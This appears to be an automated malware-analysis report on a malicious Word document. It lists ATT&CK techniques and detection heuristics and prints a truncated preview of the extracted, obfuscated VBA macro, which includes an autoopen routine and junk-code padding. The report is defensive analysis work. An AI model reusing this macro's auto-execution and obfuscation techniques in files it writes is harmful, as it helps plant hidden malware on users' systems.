MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. The macro uses GetObject and CreateObject to interact with WMI, specifically launching a process via 'winmgmts:..Win32_Process'. This indicates an attempt to execute arbitrary code, likely to download and run a second-stage payload. The obfuscation of 'winmgmts' by splitting keywords is also noted.
Heuristics 8
-
ClamAV: Doc.Malware.00536d-6943632-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6943632-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29919 bytes |
SHA-256: 5de5c1b8e45613d81f093afb300a91aceed170f9b02968bf20ebdf05b774813a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "MG1AX1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "axoZwZ"
Attribute VB_Base = "0{C048E48B-2750-47EE-AD27-3D21AD99F581}{AC90A0B1-A6E9-49BA-ADE5-D67CF5FB9B4A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "JCZXQ4"
Attribute VB_Base = "0{8645C7D1-CB6E-4A8B-A8B4-B0066A491CFC}{C6B5E892-E6D6-42AD-9367-30CF0C3F8CBA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "ow4UCA"
Sub autoopen()
If NAc4AwAD = wAUGAA Then
Select Case GQAAAwA
Case 167068954
CQkQUU = Rnd(RABDBw + 650495095 + 371117463 / wDQ1AAQA)
zA1AA1Ax = CByte(rAUAUDo + 20487845 + fA1UXUDA + 505403680)
Case 387900406
T1k4Z1C = hXQAAc
uoQQDUA = Tan(D_A1ZQUA - CSng(zDBBDA))
End Select
End If
If j_BBBAQ = aA_DAk Then
Select Case EAwAXBQG
Case 5402959
zBAw4AAA = Rnd(WZDxCQQA + 676616036 + 512829881 / tZo4AA4)
sDUAX_ = CByte(XDADBAwo + 138834269 + zCAAUD + 958147293)
Case 571616047
UAABABAA = EBowkDZA
mkX1DwQA = Tan(Lo4BAA4Q - CSng(pwDZwA))
End Select
End If
X14_BU1
If BAZXBccA = nAQDAwA Then
Select Case CAAUDx
Case 943859877
XCwUAxkZ = Rnd(KAAkBw + 544252862 + 395633711 / TXAUAc)
aAAA4wD = CByte(CxQwkB + 155554610 + uw4XQAAk + 356396423)
Case 238531479
wDAQcwx = vAxCZUcx
FDBDDxA = Tan(Y_okkQD - CSng(jADAAA))
End Select
End If
If uCBGA4Q = ADAUAoXA Then
Select Case JAAAkDo
Case 483674180
I4wAwAAx = Rnd(LQABQA + 891862522 + 573333373 / pkCQZA)
m1XkAU4U = CByte(aAUXAQA + 661755591 + Zc_1cZ + 94742458)
Case 52062674
o_AZ1ZB = lcDcQA
jBA1BA = Tan(nAoAA4 - CSng(Z4ABwoAG))
End Select
End If
End Sub
Attribute VB_Name = "SkcCADX"
Function X14_BU1()
On Error Resume Next
If tZXkXA = uACBZGB Then
Select Case R4xADQ
Case 199961955
N_ZZAA = Rnd(wB44BZ + 892411673 + 494534649 / m4UUDXk_)
ZQAc4XA = CByte(UBAcAU + 5806753 + nDkAwA_ + 888489361)
Case 284077123
RUAZA4 = jcUAGU
kA1UDCAU = Tan(IQGQUo - CSng(nxUQBB))
End Select
End If
If uAZAoAo = j4XQcwx Then
Select Case j1XBc1Q
Case 584221840
LXBAGA = Rnd(so_BxC + 418538847 + 791559013 / TXXU4A)
LAAw_1 = CByte(DkBQZ_UA + 163227692 + p1wAXkZX + 675427222)
Case 980059429
fDQBw4A = w1o1CU
ZxwB1CBc = Tan(FCDXAw - CSng(lcA_QQ))
End Select
End If
If FADZwZ = KQBAocxA Then
Select Case OkDkUDx
Case 906361846
UA1BUx = Rnd(PcoA_oA + 585722260 + 185414287 / tQoAkAD)
RcZAA1UB = CByte(vBQAAA + 494558293 + XUAA4BAA + 498426341)
Case 314639635
QA_A1Z = I_XkAZ
uAA44A = Tan(bDoQAAA - CSng(w4QDBA))
End Select
End If
If 7926 < 83936 Then
PGGUUxA = vbFalse
If MoCoXAGo = rAUAwU Then
Select Case MoQBGA_
Case 599929272
wDA1_DDB = Rnd(VAQ11AD + 710572197 + 341868934 / hkxUACU)
V4AACZ = CByte(JDUGGcX + 824028117 + doQAAAD + 295595727)
Case 957124950
hUCDxxA = SQABQc4U
soUAAA = Tan(RZBABQC - CSng(W1ACDAAA))
End Select
End If
If VAZAUB = S1XQAAo Then
Select Case qBCBAoAA
Case 733598475
JAwxAAx = Rnd(VxQcA
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.